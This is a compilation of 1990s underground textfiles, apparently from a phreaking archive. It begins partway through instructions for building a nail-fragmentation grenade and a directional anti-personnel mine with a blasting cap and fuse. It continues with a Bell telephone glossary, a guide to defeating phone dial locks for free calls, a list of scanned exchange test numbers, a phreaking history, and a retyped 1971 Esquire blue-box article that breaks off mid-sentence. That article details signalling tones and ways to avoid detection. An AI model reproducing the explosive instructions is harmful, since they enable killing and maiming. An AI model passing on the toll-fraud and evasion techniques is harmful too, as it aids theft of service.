made by pressing a round stick into the center of the charge. The hole 
should be deep enough that the blasting cap is totally within the 
explosive.
2) Tape, tie, or glue one or two rows of closely packed nails to the 
sides of the explosive block. Nails should completely cover the four 
surfaces of the block.
3) Place blasting cap on one end of the fuse cord and crimp with pliers.

NOTE: To find out how long the fuse cord should be, check the time it 
takes a known length to burn. If 12 inches (30 cm) burns for 30 seconds, 
a 10 second delay will require a 4 inch (10 cm) fuse.

4) Insert the blasting cap in the hole in the block of explosive. Tape or 
tie fuse cord securly in place so that it will not fall out when the 
grenade is thrown.

Alternate Use:
-------------

An effective directional anti-personnel mine can be made by placing nails 
on only one side of the explosive block. For this case, an electric 
blasting cap can be used.

Revised in '94.   -= Exodus =-   



The Bell Glossary                         courtesy of Exodus

    ......................................................................
    ......................................................................
    .                        The Bell Glossary -                        ..
    .                               by                                  ..
    .                         /\<\     /\<\                             ..
    .                        </\>\>ad </\>\>arvin                       ..
    ......................................................................
    ......................................................................

ACD: Automatic Call Distributor - A system that automatically distributes calls
to operator pools (providing services such as intercept and directory
assistance), to airline ticket agents, etc.

Administration: The tasks of record-keeping, monitoring, rearranging,
prediction need for growth, etc.

AIS: Automatic Intercept System - A system employing an audio-response unit
under control of a processor to automatically provide pertinent info to callers
routed to intercept.

Alert: To indicate the existence of an incoming call, (ringing).

ANI: Automatic Number Identification - Often pronounced "Annie," a facility for
automatically identify the number of the calling party for charging purposes.

Appearance: A connection upon a network terminal, as in "the line has two
network appearances."

Attend: The operation of monitoring a line or an incoming trunk for off-hook or
seizure, respectively.

Audible: The subdued "image" of ringing transmitted to the calling party during
ringing; not derived from the actual ringing signal in later systems.

Backbone Route: The route made up of final-group trunks between end offices in
different regional center areas.

BHC: Busy Hour Calls - The number of calls placed in the busy hour.

Blocking: The ratio of unsuccessful to total attempts to use a facility;
expresses as a probability when computed a priority.

Blocking Network: A network that, under certain conditions, may be unable to
form a transmission path from one end of the network to the other. In general,
all networks used within the Bell Systems are of the blocking type.

Blue Box: Equipment used fraudulently to synthesize signals, gaining access to
the toll network for the placement of calls without charge.

BORSCHT Circuit: A name for the line circuit in the central office. It
functions as a mnemonic for the functions that must be performed by the
circuit: Battery, Overvoltage, Ringing, Supervision, Coding, Hybrid, and
Testing.

Busy Signal: (Called-line-busy) An audible signal which, in the Bell System,
comprises 480hz and 620hz interrupted at 60IPM.

Bylink: A special high-speed means used in crossbar equipment for routing calls
incoming from a step-by-step office. Trunks from such offices are often
referred to as "bylink" trunks even when incoming to noncrossbar offices; they
are more properly referred to as "dc incoming trunks." Such high-speed means
are necessary to assure that the first incoming pulse is not lost.

Cable Vault: The point which phone cable enters the Central Office building.

CAMA: Centralized Automatic Message Accounting - Pronounced like Alabama.

CCIS: Common Channel Interoffice Signaling - Signaling information for trunk
connections over a separate, nonspeech data link rather that over the trunks
themselves.

CCITT: International Telegraph and Telephone Consultative Committee- An
International committee that formulates plans and sets standards for
intercountry communication means.

CDO: Community Dial Office - A small usually rural office typically served by
step-by-step equipment.

CO: Central Office - Comprises a switching network and its control and support
equipment. Occasionally improperly used to mean "office code."

Centrex: A service comparable in features to PBX service but implemented with
some (Centrex CU) or all (Centrex CO) of the control in the central office. In
the later case, each station's loop connects to the central office.

Customer Loop: The wire pair connecting a customer's station to the central
office.

DDD: Direct Distance Dialing - Dialing without operator assistance over the
nationwide intertoll network.

Direct Trunk Group: A trunk group that is a direct connection between a given
originating and a given terminating office.

EOTT: End Office Toll Trunking - Trunking between end offices in different toll
center areas.

ESB: Emergency Service Bureau - A centralized agency to which 911 "universal"
emergency calls are routed.

ESS: Electronic Switching System - A generic term used to identify as a class,
stored-program switching systems such as the Bell System's No.1 No.2, No.3,
No.4, or No.5.

ETS: Electronic Translation Systems - An electronic replacement for the card
translator in 4A Crossbar systems. Makes use of the SPC 1A Processor.

False Start: An aborted dialing attempt.

Fast Busy: (often called reorder) - An audible busy signal interrupted at twice
the rate of the normal busy signal; sent to the originating station to indicate
that the call blocked due to busy equipment.

Final Trunk Group: The trunk group to which calls are routed when available
high-usage trunks overflow; these groups generally "home" on an office next
highest in the hierarchy.

Full Group: A trunk group that does not permit rerouting off-contingent foreign
traffic; there are seven such offices.

Glare: The situation that occurs when a two-way trunk is seized more or less
simultaneously at both ends.

High Usage Trunk Group: The appellation for a trunk group that has alternate
routes via other similar groups, and ultimately via a final trunk group to a
higher ranking office.

Intercept: The agency (usually an operator) to which calls are routed when made
to a line recently removed from a service, or in some other category requiring
explanation. Automated versions (ASI) with automatic voiceresponse units are
growing in use.

Interrupt: The interruption on a phone line to disconnect and connect with
another station, such as an Emergence Interrupt.

Junctor: A wire or circuit connection between networks in the same office. The
functional equivalent to an intraoffice trunk.

MF: Multifrequency - The method of signaling over a trunk making use of the
simultaneous application of two out of six possible frequencies.

NPA: Numbering Plan Area.

ONI: Operator Number Identification - The use of an operator in a CAMA office
to verbally obtain the calling number of a call originating in an office not
equipped with ANI.

PBX: Private Branch Exchange - (PABX: Private Automatic Branch Exchange) An
telephone office serving a private customer, Typically , access to the outside
telephone network is provided.

Permanent Signal: A sustained off-hook condition without activity (no dialing
or ringing or completed connection); such a condition tends to tie up
equipment, especially in earlier systems. Usually accidental, but sometimes
used intentionally by customers in high-crime-rate areas to thwart off
burglars.

POTS: Plain Old Telephone Service - Basic service with no extra "frills".

ROTL: Remote Office Test Line - A means for remotely testing trunks.

RTA: Remote Trunk Arrangement - An extension to the TSPS system permitting its
services to be provided up to 200 miles from the TSPS site.

SF: Single Frequency. A signaling method for trunks: 2600hz is impressed upon
idle trunks.

Supervise: To monitor the status of a call.

SxS: (Step-by-Step or Strowger switch) - An electromechanical office type
utilizing a gross-motion stepping switch as a combination network and
distributed control.

Talkoff: The phenomenon of accidental synthesis of a machine-intelligible
signal by human voice causing an unintended response. "whistling a tone".

Trunk: A path between central offices; in general 2-wire for interlocal, 4-wire
for intertoll.

TSPS: Traffic Service Position System - A system that provides, under stored-
program control, efficient operator assistance for toll calls. It does not
switch the customer, but provides a bridge connection to the operator.

X-bar: (Crossbar) - An electromechanical office type utilizing a "fine-motion"
coordinate switch and a multiplicity of central controls (called markers).
There are four varieties:
        No.1 Crossbar: Used in large urban office application; (1938)
        No 3 Crossbar: A small system started in (1974).
        No.4A/4M Crossbar: A 4-wire toll machine; (1943).
        No.5 Crossbar: A machine originally intended for relatively small
                       suburban applications; (1948)
        Crossbar Tandem: A machine used for interlocal office switching.



Revised in '94 CBIV,..........   -= Exodus =-Phone Dial Locks -- How to Beat'em      courtesy of Exodus

    Have you ever been in an office or somewhere and wanted to make a free phone
call but some asshole put a lock on the phone to prevent out-going calls? Fret
no more phellow phreake, for every system can be beaten with a little knowledge!

    There are two ways to beat this obstacle, first pick the lock, I don't have
the time to teach locksmithing so we go to the second method which takes 
advantage of telephone electronics.

    To be as simple as possibnle when you pick up the phone you complete a 
circuit known as a local loop. When you hang up you break the circuit.  When
you dial (pulse) it also breaks the circuit but not long enough to hang up! So 
you can "Push-dial."  To do this you >>> RAPIDLY <<< depress the switchhook.
For example, to dial an operator (and then give her the number you want to call)
>>> RAPIDLY <<< & >>> EVENLY <<< depress the switchhook 10 times.  To dial
634-1268, depress 6 X'S pause, then 3 X'S, pause, then 4X'S, etc.  It takes a
little practice but you'll get the hang of it.  Try  practicing with your own #
so you'll get a busy tone when right.  It'll also work on touch-tone(tm) since
a DTMF line will also accept pulse.  Also, never depress the switchhook for
more than a second or it'll hang up!

    Finally, remember that you have just as much right to that phone as the
asshole who put the lock on it!

Unrevised.. I have yet to see a "Dial-Lock"..         Exodus

                 (From the Official Phreaker's Guide)




Exchange Scanning                       courtesy of Exodus


    Almost every exchange in the bell system has test #'s and other "goodies"
such as loops with dial-ups. These "goodies" are usually found betweed 9900 
and 9999 in your local exchange.  If you have the time and initiative, scan 
your exchange and you may become lucky!

Here are some findings in the 914-268 exchange:


9900 - ANI 
9901 - ANI 
9927 - OSC. TONE (POSSIBLE TONE SIDE OF A LOOP)
9936 - VOICE # TO THE TELCO CENTRAL OFFICE
9937 - VOICE # TO THE TELCO CENTRAL OFFICE
9941 - COMPUTER (DIGITAL VOICE TRANSMISSION?)
9960 - OSC. TONE (TONE SIDE LOOP) MAY ALSO BE A COMPUTER IN SOME EXCHANGES
9961 - NO RESPONSE (OTHER END OF LOOP?)
9962 - NO RESPONSE (OTHER END OF LOOP?)
9963 - NO RESPONSE (OTHER END OF LOOP?)
9966 - COMPUTER (SEE 9941)
9968 - TONE THAT DISAPPEARS--RESPONDS TO CERTAIN TOUCH-TONE KEYS

    Most of the numbers between 9900 & 9999 will ring or go to a "what #,
please?" operator.

Revised in '94..  Exodus

                   (from the Official Phreaker's Manual)



A Short History of Phreaking             courtesy of Exodus

   Well now we know a little vocabulary, and now its into history, Phreak
history.  Back at MIT in 1964 arrived a student by the name of Stewart Nelson,
who was extremely interested in the telephone.  Before entering MIT, he had
built autodialers, cheese boxes, and many more gadgets.  But when he came to
MIT he became even more interested in "fone-hacking" as they called it.  After
a little while he naturally started using the PDP-1, the schools computer at
that time, and from there he decided that it would be interesting to see
whether the computer could generate the frequencies required for blue boxing.
The hackers at MIT were not interested in ripping off Ma Bell, but just
exploring the telephone network.  Stew (as he was called) wrote a program to
generate all the tones and set off into the vast network.
   Now there were more people phreaking than the ones at MIT.  Most people have
heard of Captain Crunch (No not the cereal), he also discovered how to take
rides through the fone system, with the aid of a small whistle found in a
cereal box (can we guess which one?).  By blowing this whistle, he generated
the magical 2600hz and into the mouthpiece it sailed, giving him complete
control over the system.  I have heard rumors that at one time he made about
1/4 of the calls coming out of San Francisco.  He got famous fast.  He made the
cover of people magazine and was interviewed several times (as you'll soon
see).  Well he finally got caught after a long adventurous career.  After he
was caught he was put in jail and was beaten up quite badly because he would
not teach other inmates how to box calls.  After getting out, he joined Apple
computer and is still out there somewhere.
   Then there was Joe the Whistler, blind form the day he was born.  He could
whistle a perfect 2600hz tone.  It was rumored phreaks used to call him to tune
their boxes.
   Well that was up to about 1970, then from 1970 to 1979, phreaking was mainly
done by college students, businessmen and anyone who knew enough about
electronics and the fone company to make a 555 Ic to generate those magic
tones.  Businessmen and a few college students mainly just blue box to get free
calls.  The others were still there, exploring 800#'s and the new ESS systems.
ESS posed a big problem for phreaks then and even a bigger one now.  ESS was
not widespread, but where it was, blue boxing was next to impossible except for
the most experienced phreak.  Today ESS is installed in almost all major cities
and blue boxing is getting harder and harder.
   1978 marked a change in phreaking, the Apple ][, now a computer that was
affordable, could be programmed, and could save all that precious work on a
cassette.  Then just a short while later came the Apple Cat modem.  With this
modem, generating all blue box tones was easy as writing a program to count
form one to ten (a little exaggerated).  Pretty soon programs that could
imitate an operator just as good as the real thing were hitting the community,
TSPS and Cat's Meow, are the standard now and are the best.
   1982-1986: LD services were starting to appear in mass numbers.  People now
had programs to hack LD services, telephone exchanges, and even passwords.  By
now many phreaks were getting extremely good and BBS's started to spring up
everywhere, each having many documentations on phreaking for the novice.  Then
it happened, the movie War Games was released and mass numbers of sixth grade
to all ages flocked to see it.  The problem wasn't that the movie was bad, it
was that now EVERYONE wanted to be a hacker/phreak.  Novices came out in such
mass numbers, that bulletin boards started to be busy 24 hours a day.  To this
day, they still have not recovered.  Other problems started to occur, novices
guessed easy passwords on large government computers and started to play
around...  Well it wasn't long before they were caught, I think that many
people remember the 414-hackers.  They were so stupid as to say "yes" when the
computer asked them whether they'd like to play games.  Well at least it takes
the heat off the real phreaks/hacker/krackers.

                 (from the Official Phreaker's Manual)


                     -----> Courtesy of the Exodus <-----

         ***** The AAG Proudly Presents The AAG Proudly Presents *****
         *                                                           *
         *      +----------------------------------------------+     *
         *                                                           *
         *              Secrets of the Little Blue Box               *
         *                                                           *
         *                     by Ron Rosenbaum                      *
         *                 Typed by One Farad Cap/AAG                *
         *                                                           *
         *        -A story so incredible it may even make you        *
         *             feel sorry for the phone company-             *
         *                                                           *
         *                  (First of four files)                    *
         *                                                           *
         *      +----------------------------------------------+     *
         *                                                           *
         ***** The AAG Proudly Presents The AAG Proudly Presents *****

Dudes... These four files contain the story, "Secrets of the Little Blue Box",
by Ron Rosenbaum.

-A story so incredible it may even make you feel sorry for the phone company-

Printed in the October 1971 issue of Esquire Magazine.  If you happen to be in
a library and come across a collection of Esquire magazines, the October 1971
issue is the first issue printed in the smaller format.  The story begins on
page 116 with a picture of a blue box.
                                      --One Farad Cap, Atlantic Anarchist Guild


The Blue Box Is Introduced: Its Qualities Are Remarked

I am in the expensively furnished living room of Al Gilbertson (His real name
has been changed.), the creator of the "blue box." Gilbertson is holding one of
his shiny black-and-silver "blue boxes" comfortably in the palm of his hand,
pointing out the thirteen little red push buttons sticking up from the console.
He is dancing his fingers over the buttons, tapping out discordant beeping
electronic jingles.  He is trying to explain to me how his little blue box does
nothing less than place the entire telephone system of the world, satellites,
cables and all, at the service of the blue-box operator, free of charge.

"That's what it does.  Essentially it gives you the power of a super operator.
You seize a tandem with this top button," he presses the top button with his
index finger and the blue box emits a high-pitched cheep, "and like that" --
cheep goes the blue box again -- "you control the phone company's long-distance
switching systems from your cute little Princes phone or any old pay phone.
And you've got anonymity.  An operator has to operate from a definite location:
the phone company knows where she is and what she's doing.  But with your
beeper box, once you hop onto a trunk, say from a Holiday Inn 800 (toll-free)
number, they don't know where you are, or where you're coming from, they don't
know how you slipped into their lines and popped up in that 800 number.  They
don't even know anything illegal is going on.  And you can obscure your origins
through as many levels as you like.  You can call next door by way of White
Plains, then over to Liverpool by cable, and then back here by satellite.  You
can call yourself from one pay phone all the way around the world to a pay
phone next to you.  And you get your dime back too."

"And they can't trace the calls?  They can't charge you?"
"Not if you do it the right way.  But you'll find that the free-call thing
isn't really as exciting at first as the feeling of power you get from having
one of these babies in your hand.  I've watched people when they first get hold
of one of these things and start using it, and discover they can make
connections, set up crisscross and zigzag switching patterns back and forth
across the world.  They hardly talk to the people they finally reach.  They say
hello and start thinking of what kind of call to make next.  They go a little
crazy."  He looks down at the neat little package in his palm.  His fingers are
still dancing, tapping out beeper patterns.

"I think it's something to do with how small my models are.  There are lots of
blue boxes around, but mine are the smallest and most sophisticated
electronically.  I wish I could show you the prototype we made for our big
syndicate order."

He sighs.  "We had this order for a thousand beeper boxes from a syndicate
front man in Las Vegas.  They use them to place bets coast to coast, keep lines
open for hours, all of which can get expensive if you have to pay.  The deal
was a thousand blue boxes for $300 apiece. Before then we retailed them for
$1500 apiece, but $300,000 in one lump was hard to turn down.  We had a
manufacturing deal worked out in the Philippines.  Everything ready to go.
Anyway, the model I had ready for limited mass production was small enough to
fit inside a flip-top Marlboro box.  It had flush touch panels for a keyboard,
rather than these unsightly buttons, sticking out.  Looked just like a tiny
portable radio.  In fact, I had designed it with a tiny transistor receiver to
get one AM channel, so in case the law became suspicious the owner could switch
on the radio part, start snapping his fingers, and no one could tell anything
illegal was going on. I thought of everything for this model -- I had it lined
with a band of thermite which could be ignited by radio signal from a tiny
button transmitter on your belt, so it could be burned to ashes instantly in
case of a bust.  It was beautiful.  A beautiful little machine.  You should
have seen the faces on these syndicate guys when they came back after trying it
out.  They'd hold it in their palm like they never wanted to let it go, and
they'd say, 'I can't believe it.  I can't believe it.'  You probably won't
believe it until you try it."

The Blue Box Is Tested: Certain Connections Are Made

About eleven o'clock two nights later Fraser Lucey has a blue box in the palm
of his left hand and a phone in the palm of his right.  He is standing inside a
phone booth next to an isolated shut-down motel off Highway 1.  I am standing
outside the phone booth.

Fraser likes to show off his blue box for people.  Until a few weeks ago when
Pacific Telephone made a few arrests in his city, Fraser Lucey liked to bring
his blue box (This particular blue box, like most blue boxes, is not blue.
Blue boxes have come to be called "blue boxes" either because 1) The first blue
box ever confiscated by phone-company security men happened to be blue, or 2)
To distinguish them from "black boxes."  Black boxes are devices, usually a
resistor in series, which, when attached to home phones, allow all incoming
calls to be made without charge to one's caller.) to parties.  It never failed:
a few cheeps from his device and Fraser became the center of attention at the
very hippest of gatherings, playing phone tricks and doing request numbers for
hours.  He began to take orders for his manufacturer in Mexico.  He became a
dealer.

Fraser is cautious now about where he shows off his blue box.  But he never
gets tired of playing with it.  "It's like the first time every time," he tells
me.

Fraser puts a dime in the slot.  He listens for a tone and holds the receiver
up to my ear.  I hear the tone. Fraser begins describing, with a certain
practiced air, what he does while he does it. "I'm dialing an 800 number now.
Any 800 number will do.  It's toll free. Tonight I think I'll use the ----- (he
names a well-know rent-a-car company) 800 number.  Listen, It's ringing.  Here,
you hear it?  Now watch."  He places the blue box over the mouthpiece of the
phone so that the one silver and twelve black push buttons are facing up toward
me.  He presses the silver button -- the one at the top -- and I hear that
high-pitched beep. "That's 2600 cycles per second to be exact," says Lucey.
"Now, quick. listen."  He shoves the earpiece at me.  The ringing has vanished.
The line gives a slight hiccough, there is a sharp buzz, and then nothing but
soft white noise.

"We're home free now," Lucey tells me, taking back the phone and applying the
blue box to its mouthpiece once again.  "We're up on a tandem, into a
long-lines trunk.  Once you're up on a tandem, you can send yourself anywhere
you want to go."  He decides to check out London first.  He chooses a certain
pay phone located in Waterloo Station.  This particular pay phone is popular
with the phone-phreaks network because there are usually people walking by at
all hours who will pick it up and talk for a while.

He presses the lower left-hand corner button which is marked "KP" on the face
of the box. "That's Key Pulse.  It tells the tandem we're ready to give it
instructions.  First I'll punch out KP 182 START, which will slide us into the
overseas sender in White Plains."  I hear a neat clunk-cheep.  "I think we'll
head over to England by satellite. Cable is actually faster and the connection
is somewhat better, but I like going by satellite.  So I just punch out KP Zero
44.  The Zero is supposed to guarantee a satellite connection and 44 is the
country code for England.  Okay... we're there.  In Liverpool actually.  Now
all I have to do is punch out the London area code which is 1, and dial up the
pay phone.  Here, listen, I've got a ring now."

I hear the soft quick purr-purr of a London ring.  Then someone picks up the
phone.

"Hello," says the London voice.

"Hello.  Who's this?" Fraser asks.

"Hello.  There's actually nobody here.  I just picked this up while I was
passing by.  This is a public phone.  There's no one here to answer actually."

"Hello.  Don't hang up.  I'm calling from the United States."

"Oh.  What is the purpose of the call?  This is a public phone you know."

"Oh.  You know.  To check out, uh, to find out what's going on in London.  How
is it there?"

"Its five o'clock in the morning.  It's raining now."

"Oh.  Who are you?"

The London passerby turns out to be an R.A.F. enlistee on his way back to the
base in Lincolnshire, with a terrible hangover after a thirty-six-hour pass.
He and Fraser talk about the rain.  They agree that it's nicer when it's not
raining.  They say good-bye and Fraser hangs up.  His dime returns with a nice
clink.

"Isn't that far out," he says grinning at me.  "London, like that."

Fraser squeezes the little blue box affectionately in his palm.  "I told ya
this thing is for real.  Listen, if you don't mind I'm gonna try this girl I
know in Paris.  I usually give her a call around this time.  It freaks her out.
This time I'll use the ------ (a different rent-a-car company) 800 number and
we'll go by overseas cable, 133; 33 is the country code for France, the 1 sends
you by cable.  Okay, here we go.... Oh damn.  Busy.  Who could she be talking
to at this time?"

A state police car cruises slowly by the motel.  The car does not stop, but
Fraser gets nervous.  We hop back into his car and drive ten miles in the
opposite direction until we reach a Texaco station locked up for the night.  We
pull up to a phone booth by the tire pump. Fraser dashes inside and tries the
Paris number.  It is busy again.

"I don't understand who she could be talking to.  The circuits may be busy.
It's too bad I haven't learned how to tap into lines overseas with this thing
yet."

Fraser begins to phreak around, as the phone phreaks say.  He dials a leading
nationwide charge card's 800 number and punches out the tones that bring him
the time recording in Sydney, Australia.  He beeps up the weather recording in
Rome, in Italian of course.  He calls a friend in Boston and talks about a
certain over-the-counter stock they are into heavily.  He finds the Paris
number busy again.  He calls up "Dial a Disc" in London, and we listen to
Double Barrel by David and Ansil Collins, the number-one hit of the week in
London.  He calls up a dealer of another sort and talks in code.  He calls up
Joe Engressia, the original blind phone-phreak genius, and pays his respects.
There are other calls.  Finally Fraser gets through to his young lady in
Paris.

They both agree the circuits must have been busy, and criticize the Paris
telephone system.  At two-thirty in the morning Fraser hangs up, pockets his
dime, and drives off, steering with one hand, holding what he calls his "lovely
little blue box" in the other.

You Can Call Long Distance For Less Than You Think

"You see, a few years ago the phone company made one big mistake," Gilbertson
explains two days later in his apartment.  "They were careless enough to let
some technical journal publish the actual frequencies used to create all their
multi-frequency tones.  Just a theoretical article some Bell Telephone
Laboratories engineer was doing about switching theory, and he listed the tones
in passing.  At ----- (a well-known technical school) I had been fooling around
with phones for several years before I came across a copy of the journal in the
engineering library.  I ran back to the lab and it took maybe twelve hours from
the time I saw that article to put together the first working blue box.  It was
bigger and clumsier than this little baby, but it worked."

It's all there on public record in that technical journal written mainly by
Bell Lab people for other telephone engineers.  Or at least it was public.
"Just try and get a copy of that issue at some engineering-school library now.
Bell has had them all red-tagged and withdrawn from circulation," Gilbertson
tells me.

"But it's too late.  It's all public now.  And once they became public the
technology needed to create your own beeper device is within the range of any
twelve-year-old kid, any twelve-year-old blind kid as a matter of fact.  And he
can do it in less than the twelve hours it took us.  Blind kids do it all the
time.  They can't build anything as precise and compact as my beeper box, but
theirs can do anything mine can do."

"How?"

"Okay.  About twenty years ago A.T.&T. made a multi-billion-dollar decision to
operate its entire long-distance switching system on twelve electronically
generated combinations of twelve master tones. Those are the tones you
sometimes hear in the background after you've dialed a long-distance number.
They decided to use some very simple tones -- the tone for each number is just
two fixed single-frequency tones played simultaneously to create a certain beat
frequency.  Like 1300 cycles per second and 900 cycles per second played
together give you the tone for digit 5.  Now, what some of these phone phreaks
have done is get themselves access to an electric organ.  Any cheap family
home-entertainment organ.  Since the frequencies are public knowledge now --
one blind phone phreak has even had them recorded in one of the talking books
for the blind -- they just have to find the musical notes on the organ which
correspond to the phone tones.  Then they tape them.  For instance, to get Ma
Bell's tone for the number 1, you press down organ keys F~5 and A~5 (900 and
700 cycles per second) at the same time.  To produce the tone for 2 it's F~5
and C~6 (1100 and 700 c.p.s).  The phone phreaks circulate the whole list of
notes so there's no trial and error anymore."

He shows me a list of the rest of the phone numbers and the two electric organ
keys that produce them.

"Actually, you have to record these notes at 3 3/4 inches-per-second tape speed
and double it to 7 1/2 inches-per-second when you play them back, to get the
proper tones," he adds.

"So once you have all the tones recorded, how do you plug them into the phone
system?"

"Well, they take their organ and their cassette recorder, and start banging out
entire phone numbers in tones on the organ, including country codes, routing
instructions, 'KP' and 'Start' tones.  Or, if they don't have an organ, someone
in the phone-phreak network sends them a cassette with all the tones recorded,
with a voice saying 'Number one,' then you have the tone, 'Number two,' then
the tone and so on.  So with two cassette recorders they can put together a
series of phone numbers by switching back and forth from number to number. Any
idiot in the country with a cheap cassette recorder can make all the free calls
he wants."

"You mean you just hold the cassette recorder up the mouthpiece and switch in a
series of beeps you've recorded?  The phone thinks that anything that makes
these tones must be its own equipment?"

"Right.  As long as you get the frequency within thirty cycles per second of
the phone company's tones, the phone equipment thinks it hears its own voice
talking to it.  The original granddaddy phone phreak was this blind kid with
perfect pitch, Joe Engressia, who used to whistle into the phone.  An operator
could tell the difference between his whistle and the phone company's
electronic tone generator, but the phone company's switching circuit can't tell
them apart.  The bigger the phone company gets and the further away from human
operators it gets, the more vulnerable it becomes to all sorts of phone
phreaking."

A Guide for the Perplexed

"But wait a minute," I stop Gilbertson.  "If everything you do sounds like
phone-company equipment, why doesn't the phone company charge you for the call
the way it charges its own equipment?"

"Okay.  That's where the 2600-cycle tone comes in.  I better start from the
beginning."

The beginning he describes for me is a vision of the phone system of the
continent as thousands of webs, of long-line trunks radiating from each of the
hundreds of toll switching offices to the other toll switching offices.  Each
toll switching office is a hive compacted of thousands of long-distance tandems
constantly whistling and beeping to tandems in far-off toll switching offices.

The tandem is the key to the whole system.  Each tandem is a line with some
relays with the capability of signalling any other tandem in any other toll
switching office on the continent, either directly one-to-one or by programming
a roundabout route through several other tandems if all the direct routes are
busy.  For instance, if you want to call from New York to Los Angeles and
traffic is heavy on all direct trunks between the two cities, your tandem in
New York is programmed to try the next best route, which may send you down to a
tandem in New Orleans, then up to San Francisco, or down to a New Orleans
tandem, back to an Atlanta tandem, over to an Albuquerque tandem and finally up
to Los Angeles.

When a tandem is not being used, when it's sitting there waiting for someone to
make a long-distance call, it whistles.  One side of the tandem, the side
"facing" your home phone, whistles at 2600 cycles per second toward all the
home phones serviced by the exchange, telling them it is at their service,
should they be interested in making a long-distance call.  The other side of
the tandem is whistling 2600 c.p.s. into one or more long-distance trunk lines,
telling the rest of the phone system that it is neither sending nor receiving a
call through that trunk at the moment, that it has no use for that trunk at the
moment.

"When you dial a long-distance number the first thing that happens is that you
are hooked into a tandem.  A register comes up to the side of the tandem facing
away from you and presents that side with the number you dialed.  This sending
side of the tandem stops whistling 2600 into its trunk line.  When a tandem
stops the 2600 tone it has been sending through a trunk, the trunk is said to
be "seized," and is now ready to carry the number you have dialed -- converted
into multi-frequency beep tones -- to a tandem in the area code and central
office you want.

Now when a blue-box operator wants to make a call from New Orleans to New York
he starts by dialing the 800 number of a company which might happen to have its
headquarters in Los Angeles.  The sending side of the New Orleans tandem stops
sending 2600 out over the trunk to the central office in Los Angeles, thereby
seizing the trunk.  Your New Orleans tandem begins sending beep tones to a
tandem it has discovered idly whistling 2600 cycles in Los Angeles.  The
receiving end of that L.A. tandem is seized, stops whistling 2600, listens to
the beep tones which tell it which L.A. phone to ring, and starts ringing the
800 number.  Meanwhile a mark made in the New Orleans office accounting tape
notes that a call from your New Orleans phone to the 800 number in L.A. has
been initiated and gives the call a code number. Everything is routine so far.

But then the phone phreak presses his blue box to the mouthpiece and pushes the
2600-cycle button, sending 2600 out from the New Orleans tandem to the L.A.
tandem.  The L.A. tandem notices 2600 cycles are coming over the line again and
assumes that New Orleans has hung up because the trunk is whistling as if idle.
The L.A. tandem immediately ceases ringing the L.A. 800 number.  But as soon as
the phreak takes his finger off the 2600 button, the L.A. tandem assumes the
trunk is once again being used because the 2600 is gone, so it listens for a
new series of digit tones - to find out where it must send the call.

Thus the blue-box operator in New Orleans now is in touch with a tandem in L.A.
which is waiting like an obedient genie to be told what to do next.  The
blue-box owner then beeps out the ten digits of the New York number which tell
the L.A. tandem to relay a call to New York City.  Which it promptly does.  As
soon as your party picks up the phone in New York, the side of the New Orleans
tandem facing you stops sending 2600 cycles to you and stars carrying his voice
to you by way of the L.A. tandem.  A notation is made on the accounting tape
that the connection has been made on the 800 call which had been initiated and
noted earlier.  When you stop talking to New York a notation is made that the
800 call has ended.

At three the next morning, when the phone company's accounting computer starts
reading back over the master accounting tape for the past day, it records that
a call of a certain length of time was made from your New Orleans home to an
L.A. 800 number and, of course, the accounting computer has been trained to
ignore those toll-free 800 calls when compiling your monthly bill.

"All they can prove is that you made an 800 toll-free call," Gilbertson the
inventor concludes.  "Of course, if you're foolish enough to talk for two hours
on an 800 call, and they've installed one of their special anti-fraud computer
programs to watch out for such things, they may spot you and ask why you took
two hours talking to Army Recruiting's 800 number when you're 4-F.

But if you do it from a pay phone, they may discover something peculiar the
next day -- if they've got a blue-box hunting program in their computer -- but
you'll be a long time gone from the pay phone by then.  Using a pay phone is
almost guaranteed safe."

"What about the recent series of blue-box arrests all across the country -- New
York, Cleveland, and so on?" I asked.  "How were they caught so easily?"

"From what I can tell, they made one big mistake: they were seizing trunks
using an area code plus 555-1212 instead of an 800 number. Using 555 is easy to
detect because when you send multi-frequency beep tones of 555 you get a charge
for it on your tape and the accounting computer knows there's something wrong
when it tries to bill you for a two-hour call to Akron, Ohio, information, and
it drops a trouble card which goes right into the hands of the security agent
if they're looking for blue-box user.

"Whoever sold those guys their blue boxes didn't tell them how to use them
properly, which is fairly irresponsible.  And they were fairly stupid to use
them at home all the time.

"But what those arrests really mean is than an awful lot of blue boxes are
flooding into the country and that people are finding them so easy to make that
they know how to make them before they know how to use them.  Ma Bell is in
trouble."

And if a blue-box operator or a cassette-recorder phone phreak sticks to pay
phones and 800 numbers, the phone company can't stop them?

"Not unless they change their entire nationwide long-lines technology, which
will take them a few billion dollars and twenty years.  Right now they can't do
a thing.  They're screwed."

Captain Crunch Demonstrates His Famous Unit

There is an underground telephone network in this country.  Gilbertson
discovered it the very day news of his activities hit the papers. That evening
his phone began ringing.  Phone phreaks from Seattle, from Florida, from New
York, from San Jose, and from Los Angeles began calling him and telling him
about the phone-phreak network.  He'd get a call from a phone phreak who'd say
nothing but, "Hang up and call this number."

When he dialed the number he'd find himself tied into a conference of a dozen
phone phreaks arranged through a quirky switching station in British Columbia.
They identified themselves as phone phreaks, they demonstrated their homemade
blue boxes which they called "M-Fers" (for "multi-frequency," among other
things) for him, they talked shop about phone-phreak devices.  They let him in
on their secrets on the theory that if the phone company was after him he must
be trustworthy.  And, Gilbertson recalls, they stunned him with their technical
sophistication.

I ask him how to get in touch with the phone-phreak network.  He digs around
through a file of old schematics and comes up with about a dozen numbers in
three widely separated area codes.

"Those are the centers," he tells me.  Alongside some of the numbers he writes
in first names or nicknames: names like Captain Crunch, Dr. No, Frank Carson
(also a code word for a free call), Marty Freeman (code word for M-F device),
Peter Perpendicular Pimple, Alefnull, and The Cheshire Cat.  He makes checks
alongside the names of those among these top twelve who are blind.  There are
five checks.

I ask him who this Captain Crunch person is.

"Oh.  The Captain.  He's probably the most legendary phone phreak.  He calls
himself Captain Crunch after the notorious Cap'n Crunch 2600 whistle."
(Several years ago, Gilbertson explains, the makers of Cap'n Crunch breakfast
cereal offered a toy-whistle prize in every box as a treat for the Cap'n Crunch
set.  Somehow a phone phreak discovered that the toy whistle just happened to
produce a perfect 2600-cycle tone.  When the man who calls himself Captain
Crunch was transferred overseas to England with his Air Force unit, he would
receive scores of calls from his friends and "mute" them -- make them free of
charge to them -- by blowing his Cap'n Crunch whistle into his end.)
"Captain Crunch is one of the older phone phreaks," Gilbertson tells me.  "He's
an engineer who once got in a little trouble for fooling around with the phone,
but he can't stop.  Well, they guy drives across country in a Volkswagen van
with an entire switchboard and a computerized super-sophisticated M-F-er in the
back.  He'll pull up to a phone booth on a lonely highway somewhere, snake a
